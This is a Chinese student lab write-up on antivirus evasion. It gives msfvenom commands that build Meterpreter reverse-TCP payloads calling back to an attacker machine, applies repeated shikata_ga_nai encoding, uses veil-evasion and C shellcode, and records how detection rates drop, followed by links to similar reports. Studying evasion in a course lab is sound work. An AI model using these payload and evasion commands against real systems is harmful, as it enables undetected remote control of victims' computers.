正文 

当前位置: 首页 > java > java教程

20145309《网络对抗技术》免杀原理与实践

20145309李昊 20145309李昊     2022-08-25     252

关键词:

20145309《网络对抗技术》免杀原理与实践

1.基础问题回答

(1)杀软是如何检测出恶意代码的?

根据特征来检测:对已存在的流行代码特征的提取与比对
根据行为来检测:是否有更改注册表行为、是否有设置自启动、是否有修改权限等等

 

(2)免杀是做什么?

使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。

(3)免杀的基本方法有哪些?

   加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,所以加这些壳还不如不加;
加花指令:就是加一段垃圾代码,但是并不影响程序的正常执行,加了花指令后,使一些杀毒软件无法正确识别木马程序,从而达到免杀的效果;
   再编译:如果有源代码可以使用其他语言重新编写再编译,或者利用已有的shellcode构造payload重新编译生成;
修改行为:尽量少做能被杀毒软件直接检测到的敏感行为,可以使用反弹式连接,或者减少对系统注册表之类的修改。

 

2.实践总结与体会

本次实验做得非常艰难,但是最后在反复纠缠室友的前提下还是完成了,通过实验我了解了杀毒软件查杀的原理,以及一般恶意代码是如何伪装的。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。

3.离实战还缺些什么技术或步骤?

编程能力的问题,以我现在的水平,只能理解恶意代码的基本原理,还要借助一些恶意代码的生成和编译工具,并不能全手工做出一个恶意代码,所以很容易就会被杀毒软件检查到。

4.实践过程记录

msfvenom直接生成meterpreter可执行文件

  • Windows的IP地址为:192.168.1.105
  • Kali的IP地址为:193.168.1.106
  • 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5309 -f exe > test.exe命令生成meterpreter可执行文件test.exe
  • 使用ncat将文件传输到windows主机

我们上http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来

  • 扫描结果:51%的杀软(20/39)报告发现病毒

Msfvenom使用编码器生成meterpreter可执行文件

编码一次:

  • 使用ncat将文件传输到windows主机

再次检测:

 

  • 描结果:46%的杀软(18/39)报告发现病毒
  • 编码十次

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.106 PORT=5309-f 

 再次检测:

 

  • 扫描结果:46%的杀软(18/39)报告发现病毒
  • 编码十次

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.106 PORT=5309 -f exe > test2.exe命令生成编码过的可执行文件test2.exe

 

  • 使用ncat将文件传输到windows主机

再次检测:

  • 在Kali中打开veil-evasion:直接在输入veil-evasion
  • 然后在menu里面输入以下命令来生成可执行文件:
  • use python/meterpreter/rev_tcp
  • set LHOST 192.168.1.106
  • generate
  • 5309test

检测结果如下:

  • 扫描结果:23%的杀软(9/39)报告发现病毒,效果显著提升。

使用C语言调用Shellcode

  • 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.95 LPORT=333 -f c命令生成一个C语言shellcode数组
  • 利用这个数组在Windows主机的vs平台下写shellcode,

程序一生成就被360杀毒查杀了

在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。

360杀毒查杀不出来

 

检测结果如下:

  • 扫描结果:12%的杀软(5/39)报告发现病毒。基本达成。

 


 

 

 

 

2017-2018-420155317《网络对抗技术》exp3免杀原理与实践

2017-2018-420155317《网络对抗技术》EXP3免杀原理与实践一、问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.实践(1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情

2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情

20165218《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践(代码片段)

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践免杀工具1——msfvenom使用编码器知道msfvenom的编码原理,就知道不管迭代编码多少次都没用,总有一段译码指令在头部,这个头部就在特征库里,一下就检测出来了。但还是... 查看详情

2018-2019-2网络对抗技术201652287exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术201652287Exp3免杀原理与实践**免杀**-一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。-要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-viru... 查看详情

2018-2019-2网络对抗技术20165228exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术20165228Exp3免杀原理与实践免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是... 查看详情

2018-2019-220165114《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践目录一、实验内容二、基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?三、实践过程记录正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用... 查看详情

20155217《网络对抗》exp03免杀原理与实践(代码片段)

20155217《网络对抗》Exp03免杀原理与实践实践内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧。通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单... 查看详情

20155302《网络对抗》exp3免杀原理与实践

20155302《网络对抗》Exp3免杀原理与实践实验要求1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了... 查看详情

2018~2019-420165107网络对抗技术exp3免杀原理与实践(代码片段)

20165107Exp3免杀原理与实践实验要求1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧2、通过组合应用各种技术实现恶意代码免杀3、用另一电脑实测,在杀软开... 查看详情

20165101刘天野2018-2019-2《网络对抗技术》exp3免杀原理与实践(代码片段)

20165101刘天野2018-2019-2《网络对抗技术》Exp3免杀原理与实践1.实践内容1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧1.1.1使用msf编码器输入命令msfvenom-h可查看相关用法:... 查看详情

2018-2019-2网络对抗技术20165314exp3免杀原理与实践(代码片段)

免杀原理与实践说明一、实验说明任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)任务二:通过组合应用各种技术实现恶意代码免杀(1分)任务三:用另一... 查看详情

2018-2019-220162318《网络对抗技术》exp3免杀原理与实践(代码片段)

一、实验内容1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion),加壳工具),使用shellcode编程2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的... 查看详情

2018-2019-220165302《网络对抗技术》exp3免杀原理与实践(代码片段)

一,实验要求通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力二,实验内容1.了解恶意软件检测机制和免杀技术的基本原理正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情

2018-2019-2网络对抗技术20165307exp3免杀原理与实践(代码片段)

1.实践内容(3.5分)1.1正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)1.2通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了... 查看详情

2018-2019-220165330《网络对抗技术》exp3免杀原理与实践(代码片段)

目录基础问题相关知识实验内容实验步骤实验过程中遇到的问题离实战还缺些什么技术或步骤?实验总结与体会实验内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工... 查看详情

2017-2018-220155230《网络对抗技术》实验3:免杀原理与实践

...成,且是只有该病毒内才出现的字符串,根据已检测出或网络上公布的病毒,对其提取特征码,记录在病毒库中,检测到程序时将程序与特征码比对即可判断是否是恶意代码。②启发式恶意软件的检测:将一个软件与恶意软件的... 查看详情

20145239杜文超《网络对抗》-免杀原理与实践

《网络对抗》-免杀原理与实践基础问题回答(1)杀软是如何检测出恶意代码的?根据搜集来的最全的、最新的特征码库,检测程序有没有异常或者可疑的行为。(2)免杀是做什么?利用一些手段,让你的的后门不被AV软件发现... 查看详情